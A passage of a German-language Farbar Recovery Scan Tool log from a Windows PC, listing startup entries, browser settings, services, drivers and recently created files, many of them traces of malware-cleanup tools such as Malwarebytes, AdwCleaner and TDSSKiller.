(Atheros Communications) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe (Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe ==================== Registry (Nicht auf der Ausnahmeliste) =========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13449288 2013-03-26] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1278024 2013-03-08] (Realtek Semiconductor) HKLM\...\Run: [Samsung Link] => C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe [600928 2014-03-13] (Copyright 2013 SAMSUNG) HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe" HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation) HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [619008 2010-05-25] (Nikon Corporation) HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-03] (Adobe Systems Incorporated) HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [807392 2016-03-21] (Avira Operations GmbH & Co. 
KG) HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [132224 2013-02-28] (Atheros Communications) HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [718208 2010-03-16] (Microsoft Corporation) ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] () ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] () ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] () ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{CDCF1B09-7464-4C3E-A16A-C67E31D926EC}: [DhcpNameServer] 192.168.1.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=MSE1 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130926929970896047&GUID=91D7EFA7-E23E-4872-8361-CEB8ED36209E HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/ SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM-x32 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> DefaultScope {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?} SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = 
hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?} BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation) StartMenuInternet: IEXPLORE.EXE - iexplore.exe FireFox: ======== FF ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1 FF NewTab: about:newtab FF Homepage: about:home FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-03] (Adobe Systems) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-02-18] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-02-18] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-10-23] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-10-23] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-14] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-03] (Adobe Systems) FF Extension: Default - C:\Program 
Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-16] [ist nicht signiert] Chrome: ======= CHR dev: Chrome dev build erkannt! <======= ACHTUNG StartMenuInternet: Google Chrome - chrome.exe ==================== Dienste (Nicht auf der Ausnahmeliste) ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 AdobeActiveFileMonitor13.0; C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe [231120 2014-08-31] (Adobe Systems Incorporated) S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [955736 2016-03-21] (Avira Operations GmbH & Co. KG) R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG) R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG) S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1424880 2016-03-21] (Avira Operations GmbH & Co. 
KG) R2 AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [227968 2013-02-28] (Qualcomm Atheros Commnucations) [Datei ist nicht signiert] R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe [2797312 2013-12-04] (Acer Incorporated) S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [660040 2013-01-18] (Acer Incorporated) R2 EpsonCustomerResearchParticipation; C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe [676336 2015-09-03] (SEIKO EPSON CORPORATION) R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation) R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation) R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128896 2013-02-18] (Intel Corporation) R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2013-02-18] (Intel Corporation) R2 LMSvc; C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe [431656 2013-03-15] (Acer Incorporate) R2 MBAMScheduler; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes) R2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1136608 2016-03-10] (Malwarebytes) R2 Samsung Link Service; C:\Program Files\Samsung\Samsung Link\Samsung Link.exe [609632 2014-03-13] (Copyright 2013 SAMSUNG) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation) ===================== Treiber (Nicht auf der Ausnahmeliste) ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [128664 2016-03-21] (Avira Operations GmbH & Co. KG) R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [137952 2016-03-21] (Avira Operations GmbH & Co. KG) R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [35488 2016-03-21] (Avira Operations GmbH & Co. KG) R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [68936 2016-03-21] (Avira Operations GmbH & Co. KG) S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-02-28] (Qualcomm Atheros) S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation) R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21360 2013-01-10] (Acer Incorporated) R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes) R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-31] (Malwarebytes) R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation) R0 PxHlpa64; C:\Windows\System32\drivers\PxHlpa64.sys [56336 2013-09-03] (Corel Corporation) S3 QRDCIO; C:\Windows\System32\drivers\QRDCIO.sys [9728 2009-10-20] (QUANTA) R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [15704 2013-01-10] (Acer Incorporated) R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [455240 2013-03-05] (RTS Corporation) S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation) R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation) ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2016-03-31 12:39 - 2016-03-31 12:40 - 00015188 _____ C:\Users\Denny\Desktop\FRST.txt 2016-03-31 12:29 - 2016-03-31 12:29 - 00000868 _____ C:\Users\Denny\Desktop\Fixlog.txt 2016-03-30 23:51 - 2016-03-30 23:51 - 02870984 _____ (ESET) C:\Users\Denny\Downloads\esetsmartinstaller_deu.exe 2016-03-30 14:03 - 2016-03-30 14:03 - 00000000 ____D C:\Users\Denny\AppData\Local\VirtualStore 2016-03-30 13:51 - 2016-03-30 12:59 - 00024064 _____ C:\WINDOWS\zoek-delete.exe 2016-03-30 12:59 - 2016-03-30 13:44 - 00000000 ____D C:\zoek_backup 2016-03-30 12:59 - 2016-03-30 12:59 - 01309184 _____ C:\Users\Denny\Downloads\zoek.exe 2016-03-30 12:48 - 2016-03-30 12:48 - 00000749 _____ C:\Users\Denny\Desktop\Revo Uninstaller.lnk 2016-03-30 12:48 - 2016-03-30 12:48 - 00000000 ____D C:\Users\Denny\Desktop\Revo Uninstaller 2016-03-30 12:48 - 2016-03-30 12:48 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller 2016-03-30 12:45 - 2016-03-30 12:45 - 02623656 _____ (VS Revo Group Ltd.) 
C:\Users\Denny\Downloads\revosetup95.exe 2016-03-29 19:15 - 2016-03-29 19:35 - 00197204 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_19.15.23_log.txt 2016-03-29 18:17 - 2016-03-29 18:18 - 03102208 _____ C:\Users\Denny\Desktop\AdwCleaner_5.107.exe 2016-03-29 16:48 - 2016-03-31 12:32 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2016-03-29 16:48 - 2016-03-29 18:20 - 00001072 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\ProgramData\Malwarebytes 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 2016-03-29 16:48 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys 2016-03-29 16:48 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 2016-03-29 16:48 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys 2016-03-29 16:43 - 2016-03-29 16:47 - 22851472 _____ (Malwarebytes ) C:\Users\Denny\Downloads\mbam-setup-2.2.1.1043.exe 2016-03-29 12:52 - 2016-03-29 13:00 - 00231358 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.52.00_log.txt 2016-03-29 12:50 - 2016-03-29 12:51 - 00008896 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.50.27_log.txt 2016-03-29 12:49 - 2016-03-29 12:50 - 04727984 _____ (Kaspersky Lab ZAO) C:\Users\Denny\Desktop\tdsskiller.exe 2016-03-29 12:45 - 2016-03-29 12:45 - 00000144 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2016-03-28 23:46 - 2016-03-30 15:00 - 00000000 ____D C:\Users\Denny\Desktop\Infos 2016-03-28 23:36 - 2016-03-28 23:37 - 00031180 _____ C:\Users\Denny\Downloads\Addition.txt 2016-03-28 23:34 - 2016-03-31 12:39 - 00000000 ____D C:\FRST 2016-03-28 23:34 - 2016-03-28 23:37 - 00051376 _____ C:\Users\Denny\Downloads\FRST.txt 
2016-03-28 23:33 - 2016-03-28 23:33 - 02374144 _____ (Farbar) C:\Users\Denny\Desktop\FRST64.exe 2016-03-28 23:32 - 2016-03-28 23:32 - 01725440 _____ (Farbar) C:\Users\Denny\Downloads\FRST.exe 2016-03-28 23:18 - 2016-03-28 23:28 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-500 2016-03-28 23:18 - 2016-03-28 23:18 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Avira 2016-03-28 23:10 - 2016-03-28 23:24 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Local\Packages 2016-03-28 23:10 - 2016-03-28 23:10 - 00001454 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-28 23:10 - 2016-03-28 23:10 - 00000020 ___SH C:\Users\Administrator.Schneider\ntuser.ini 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Vorlagen 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Startmenü 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Netzwerkumgebung 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Lokale Einstellungen 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Eigene Dateien 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Druckumgebung 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Videos 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Musik 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Bilder 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL 
C:\Users\Administrator.Schneider\AppData\Local\Verlauf 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Anwendungsdaten 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Anwendungsdaten 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 __SHD C:\Users\Administrator\IntelGraphicsProfiles 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Adobe 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider 2016-03-28 23:10 - 2014-03-29 08:08 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Macromedia 2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk 2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk 2016-03-22 02:54 - 2016-03-22 02:54 - 01610352 _____ (Malwarebytes) C:\Users\Denny\Downloads\JRT.exe 2016-03-22 00:31 - 2016-03-22 00:31 - 01474568 _____ C:\Users\Denny\Downloads\BitDefender Adware Removal Tool - CHIP-Installer.exe 2016-03-22 00:21 - 2016-03-29 18:20 - 00001123 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2016-03-22 00:21 - 2016-03-29 18:20 - 00001117 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2016-03-22 00:21 - 2016-03-22 00:21 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2016-03-21 23:58 - 2016-03-21 23:58 - 00242376 _____ C:\Users\Denny\Downloads\Firefox Setup Stub 45.0.1.exe 2016-03-21 23:26 - 2016-02-20 17:45 - 01373184 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 01168896 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00696832 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2016-03-21 23:26 - 
2016-02-20 17:45 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2016-03-21 23:26 - 2016-02-05 21:06 - 00046768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2016-03-21 23:26 - 2016-01-24 20:19 - 00419160 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys 2016-03-21 23:26 - 2016-01-24 20:19 - 00378712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys 2016-03-21 23:26 - 2016-01-24 20:19 - 00331608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys 2016-03-21 23:26 - 2016-01-24 13:57 - 01335296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll 2016-03-21 23:26 - 2016-01-24 13:45 - 01063424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll 2016-03-21 23:26 - 2016-01-09 03:38 - 00091992 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbehci.sys 2016-03-21 23:26 - 2016-01-06 20:25 - 00416768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2016-03-21 23:26 - 2015-12-30 23:53 - 02017624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2016-03-21 23:23 - 2016-02-06 18:58 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2016-03-21 23:23 - 2016-02-06 18:32 - 00801792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2016-03-21 23:23 - 2016-01-10 18:41 - 01707008 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll 2016-03-21 23:23 - 2016-01-10 18:31 - 01344512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll 2016-03-21 23:23 - 2016-01-09 03:49 - 00218448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rsaenh.dll 2016-03-21 23:23 - 2016-01-09 03:49 - 00192120 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\rsaenh.dll 2016-03-21 23:23 - 2016-01-07 01:46 - 00148752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscapi.dll 2016-03-21 23:23 - 2016-01-07 01:45 - 00177712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll 2016-03-21 23:23 - 2016-01-06 18:47 - 00146944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll 2016-03-21 23:23 - 2015-12-30 22:49 - 00470360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys 2016-03-21 23:23 - 2015-12-20 16:57 - 00839168 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll 2016-03-21 23:23 - 2015-12-20 16:43 - 00696320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll 2016-03-21 23:23 - 2015-11-19 16:33 - 00994760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll 2016-03-21 23:23 - 2015-11-19 16:26 - 00922432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2016-03-21 22:54 - 2016-03-29 18:39 - 00000000 ____D C:\AdwCleaner 2016-03-21 22:27 - 2016-03-21 22:36 - 00000000 ____D C:\Users\Denny\Desktop\Pferd 2016-03-21 18:50 - 2016-03-21 18:50 - 600300950 _____ C:\WINDOWS\MEMORY.DMP 2016-03-21 18:50 - 2016-03-21 18:50 - 00284928 _____ C:\WINDOWS\Minidump\032116-30421-01.dmp 2016-03-21 18:44 - 2016-01-15 18:56 - 02487296 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll 2016-03-21 18:44 - 2016-01-15 18:45 - 01482240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll 2016-03-21 18:44 - 2016-01-05 17:00 - 00570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2016-03-21 18:44 - 2015-12-20 16:56 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\msra.exe 2016-03-21 18:37 - 2016-03-29 18:20 - 00001192 _____ C:\Users\Public\Desktop\Avira Antivirus.lnk 2016-03-21 18:37 - 2016-03-21 18:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira 2016-03-21 18:15 - 2016-03-21 18:15 - 00000000 ____D C:\Users\Denny\AppData\Local\app 2016-03-21 18:14 - 2016-03-21 18:43 
- 00000000 ____D C:\Users\Denny\AppData\Roaming\Avira 2016-03-21 18:07 - 2016-03-21 18:35 - 00000000 ____D C:\ProgramData\Avira 2016-03-21 18:07 - 2016-03-21 18:34 - 00137952 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00128664 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00068936 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00035488 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys 2016-03-21 18:07 - 2016-03-21 18:07 - 00000000 ____D C:\Program Files (x86)\Avira 2016-03-21 17:38 - 2016-03-08 09:00 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2016-03-21 17:38 - 2016-03-08 09:00 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2016-03-21 16:28 - 2016-02-12 21:14 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe 2016-03-21 16:28 - 2016-02-12 17:14 - 03708416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2016-03-21 16:28 - 2016-02-12 16:55 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:51 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:48 - 02244096 _____ 
